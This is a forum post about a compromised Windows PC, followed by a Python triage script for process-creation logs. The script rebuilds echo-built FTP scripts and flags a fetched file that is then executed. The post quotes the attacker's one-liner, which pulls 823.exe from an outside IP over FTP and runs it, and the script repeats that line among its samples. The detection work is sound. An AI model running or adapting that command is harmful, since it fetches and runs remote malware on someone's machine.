My brother-in-law just called me frantically saying his computer had been hacked. He was in a remote session to his computer from work using VNC when he suddenly lost, and could not regain, the connection.
When he got home, he noticed that when he clicked start > run, the last command was:
cmd.exe /c del i&echo open 18.104.22.168 27206 > i&echo user 1 1 >> i &echo get 823.exe >> i &echo quit >> i &ftp -n -s:i &823.exe&del i&exit
Now, if you connect to that IP on that port, you'll be greeted with "220 Reptile welcomes you.." which looks like a standard FTP greeting, but accepts no commands. Everything I enter, I receive a 503 command unknown. Also, none of his system commands are working (i.e. cd, netstat, ipconfig, etc.). Sounds sorta like a rootkit.
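The command line in the post is a classic echo-to-ftp-script download-and-execute: `echo` builds an FTP script in a temp file, `ftp -n -s:<file>` runs it, the fetched executable is started, and the script is deleted. For anyone hunting for the same pattern in process-creation logs, here is an added triage script (written for this reply, not something the poster or anyone else ran) that reconstructs the echo-built script from a command line and flags it when a file fetched with `get` is executed later in the same line. The sample command lines are constructed for the illustration; the first one is the command quoted above, the other two are benign controls.

```python
import re
from dataclasses import dataclass, field

# Constructed sample process-creation command lines for this illustration.
# The first is the command from the post; the other two are benign controls.
SAMPLE_COMMAND_LINES = [
    "cmd.exe /c del i&echo open 18.104.22.168 27206 > i&echo user 1 1 >> i &echo get 823.exe >> i &echo quit >> i &ftp -n -s:i &823.exe&del i&exit",
    "cmd.exe /c echo open files.example.internal > up.txt&echo user backup secret >> up.txt&echo put report.zip >> up.txt&ftp -n -s:up.txt&del up.txt",
    "cmd.exe /c dir C:\\Users",
]

# ftp driven by a script file: ftp -n -s:i  /  ftp -s:"script.txt"
FTP_SCRIPT_RE = re.compile(r'^ftp\b.*?-s:"?(?P<script>[^\s"&|]+)', re.IGNORECASE)
# echo <text> > file  /  echo <text> >> file
ECHO_REDIRECT_RE = re.compile(r"^echo\s+(?P<text>[^>&|]*?)\s*>>?\s*(?P<target>[^\s&|]+)", re.IGNORECASE)
DOWNLOAD_VERBS = {"get", "mget", "recv"}
SEVERITY_ORDER = ("low", "medium", "high")


@dataclass
class Finding:
    script_file: str
    script_lines: list = field(default_factory=list)
    downloaded: list = field(default_factory=list)
    executed: list = field(default_factory=list)

    @property
    def severity(self):
        if self.executed:
            return "high"      # file fetched over FTP and run in the same command line
        if self.downloaded:
            return "medium"    # file fetched, no execution seen in this command line
        return "low"           # ftp driven by an inline script, nothing fetched


def split_commands(cmdline):
    """Drop a leading 'cmd.exe /c' and split on the cmd operators &, &&, |, ||."""
    cmdline = re.sub(r'^\s*"?cmd(?:\.exe)?"?\s+/[cCkK]\s+', "", cmdline)
    return [p.strip() for p in re.split(r"&&|\|\||[&|]", cmdline) if p.strip()]


def analyze_command_line(cmdline):
    """Rebuild echo-built ftp scripts and report whether a fetched file is executed."""
    parts = split_commands(cmdline)
    scripts = {}   # script file name -> lines written to it with echo
    findings = []
    for idx, part in enumerate(parts):
        m = ECHO_REDIRECT_RE.match(part)
        if m:
            scripts.setdefault(m["target"].lower(), []).append(m["text"].strip())
            continue
        m = FTP_SCRIPT_RE.match(part)
        if not m:
            continue
        name = m["script"].lower()
        finding = Finding(script_file=name, script_lines=list(scripts.get(name, [])))
        for line in finding.script_lines:
            tokens = line.split()
            if len(tokens) > 1 and tokens[0].lower() in DOWNLOAD_VERBS:
                finding.downloaded.append(tokens[-1].lower())
        # Any later command whose program name is a downloaded file counts as execution
        for later in parts[idx + 1:]:
            tokens = later.split()
            if not tokens:
                continue
            head = tokens[0].lower()
            if head in ("start", "call") and len(tokens) > 1:
                head = tokens[1].lower()
            head = head.rsplit("\\", 1)[-1].strip('"')
            if head in finding.downloaded:
                finding.executed.append(head)
        findings.append(finding)
    return findings


def triage(command_lines):
    """Return (command_line, worst severity) for each line that drives ftp with an echo-built script."""
    results = []
    for cmdline in command_lines:
        findings = analyze_command_line(cmdline)
        if findings:
            worst = max(findings, key=lambda f: SEVERITY_ORDER.index(f.severity))
            results.append((cmdline, worst.severity))
    return results


if __name__ == "__main__":
    for cmdline, severity in triage(SAMPLE_COMMAND_LINES):
        print(f"[{severity}] {cmdline}")
```

The reconstruction is what makes this useful for triage: the rebuilt script gives the server address, port, credentials and file name straight from the log entry, without needing the temp file that the attacker deleted. The "low" result for the benign upload shows why the rule keys on a `get` followed by execution rather than on `ftp -s:` alone, which administrators legitimately script.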